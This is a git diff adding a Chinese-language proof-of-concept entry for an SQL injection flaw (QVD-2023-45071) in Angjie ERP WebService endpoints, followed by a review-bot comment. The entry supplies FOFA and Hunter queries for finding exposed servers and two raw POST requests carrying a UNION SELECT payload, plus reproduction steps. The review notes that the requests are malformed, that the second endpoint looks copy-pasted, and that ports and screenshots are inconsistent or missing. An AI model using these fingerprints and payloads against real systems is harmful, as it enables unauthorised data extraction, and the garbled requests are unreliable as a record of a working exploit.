diff --git a/昂捷ERP WebService接口 SQL注入漏洞(QVD-2023-45071).md b/昂捷ERP WebService接口 SQL注入漏洞(QVD-2023-45071).md
new file mode 100644
index 0000000..cd9ed16
--- /dev/null
+++ b/昂捷ERP WebService接口 SQL注入漏洞(QVD-2023-45071).md
@@ -0,0 +1,56 @@
+## 昂捷ERP-WebService接口-SQL注入漏洞(QVD-2023-45071)
+ 昂捷ERP WebService接口 存在SQL注入漏洞,未经身份验证的攻击者可以利用该漏洞泄露系统敏感信息。
+
+## fofa
+```
+body="CheckSilverlightInstalled"
+```
+
+## hunter
+```
+web.body="CheckSilverlightInstalled"
+```
+
+## SQL注入点1 /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx
+```
+POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
+Host: xxx.xxx.xxx.xxx:8008
+Content-Type: text/xml;
+charset=utf-8
+Content-Length: 482
+
+SOAPAction: "http://tempuri.org/GetOSpById"
+string' UNION SELECT NULL,NULL,NULL,NULL,(select @@version),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YQmj
+```
+
+## SQL注入点2 /EnjoyRMIS_WS/WS/Hr/CWSHr.asmx
+```
+POST /EnjoyRMIS_WS/WS/Hr/CWSHr.asmx HTTP/1.1
+Host: xxx.xxx.xxx.xxx:8008
+Content-Type: text/xml;
+charset=utf-8
+Content-Length: 482
+
+SOAPAction: "http://tempuri.org/GetOSpById"
+string' UNION SELECT NULL,NULL,NULL,NULL,(select @@version),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YQmj
+```
+
+## 漏洞复现
+访问漏洞点存在的地址
+
+http://xxx.xxx.xxx.xxx:9012/EnjoyRMIS_WS/WS/Hr/CWSHr.asmx
+
+在地址后面加上?wsdl
+
+http://xxx.xxx.xxx.xxx:8123/EnjoyRMIS_WS/WS/Hr/CWSHr.asmx?wsdl
+
+
+
+使用wsdler拓展工具解析
+
+
+
+解析完成之后,即可对这些接口进行测试
+
+
+
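Review bot: The block under `## SQL注入点2 /EnjoyRMIS_WS/WS/Hr/CWSHr.asmx` is identical to the one under 注入点1 apart from the request path (same `SOAPAction: "http://tempuri.org/GetOSpById"`, same `Content-Length: 482`), so it reads as a copy-paste rather than a separately verified finding. Please confirm the operation name against that service's WSDL, or state that the second endpoint was not verified. In both blocks the request is not a faithful record of what was sent: `charset=utf-8` sits on its own line, `SOAPAction` appears after the blank line that ends the headers, and the stated Content-Length does not match the body shown. The 漏洞复现 section uses ports 9012 and 8123 while the requests use 8008, and the blank runs after "使用wsdler拓展工具解析" look like screenshots that were dropped; add the images or remove the gaps. The file also has no affected-version, remediation or detection section. A short one covering vendor fix status, restricting network access to the `/EnjoyRMIS_WS/WS/` endpoints, and alerting on `UNION SELECT` in POST bodies sent to these two `.asmx` paths would make the entry usable by defenders.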